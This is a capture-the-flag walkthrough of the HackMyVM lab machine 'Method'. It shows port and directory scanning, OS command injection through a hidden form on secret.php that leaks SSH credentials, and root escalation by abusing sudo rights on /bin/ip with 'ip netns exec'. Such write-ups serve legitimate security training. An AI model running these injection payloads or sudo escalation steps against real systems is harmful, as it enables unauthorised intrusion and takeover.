NOTES ABOUT Method

[ 2022-10-23 ] [ HackMyVM / Method ]

Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, Sudo
Tools: nmap, ssh, gobuster, curl, sudo ip

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.37

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
| 256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
|_ 256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Test Page for the Nginx HTTP Server on Fedora
|_http-server-header: nginx/1.18.0

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.37 --exclude-length 3690
/index.htm (Status: 200) [Size: 344]
/sitemap.xml (Status: 200) [Size: 285]
/note.txt (Status: 200) [Size: 23]
/secret.php (Status: 302) [Size: 0] [--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]

$ curl 10.0.2.37/sitemap.xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="https://hackmyvm/sitemap/0.9">
<url>
<loc>https://hackmyvm.eu/machines/index.htm?vm=Brain</loc>
<lastmod>2020-02-13</lastmod>
<changefreq>monthly</changefreq>
<priority>0.8</priority>
</url>
</urlset>

$ curl 10.0.2.37/index.htm?vm=Brain
<h1>It\'s Hacking Time</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="640">
<img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
<form action="/secret.php" hidden="true" method="GET">
<input type="text" name="HackMyVM" value="" maxlength="100"><br>
<input type="submit" value="Submit">
</form>

$ curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=id'
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>

ELEVATING PRIVILEGES

curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=cat secret.php'
You Found ME : - (<pre><?php
[...]
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>

$ ssh prakasaka@10.0.2.37                 
prakasaka@10.0.2.37\'s password:

prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip

prakasaka@method:~$ cat user.txt
********************

prakasaka@method:~$ sudo /bin/ip netns add foo
prakasaka@method:~$ sudo /bin/ip netns exec foo /bin/bash

root@method:~# cat root.txt
********************

root@method:~# init 0
root@method:~# Connection to 10.0.2.37 closed by remote host.
Connection to 10.0.2.37 closed.

--- Loaded 402 times ---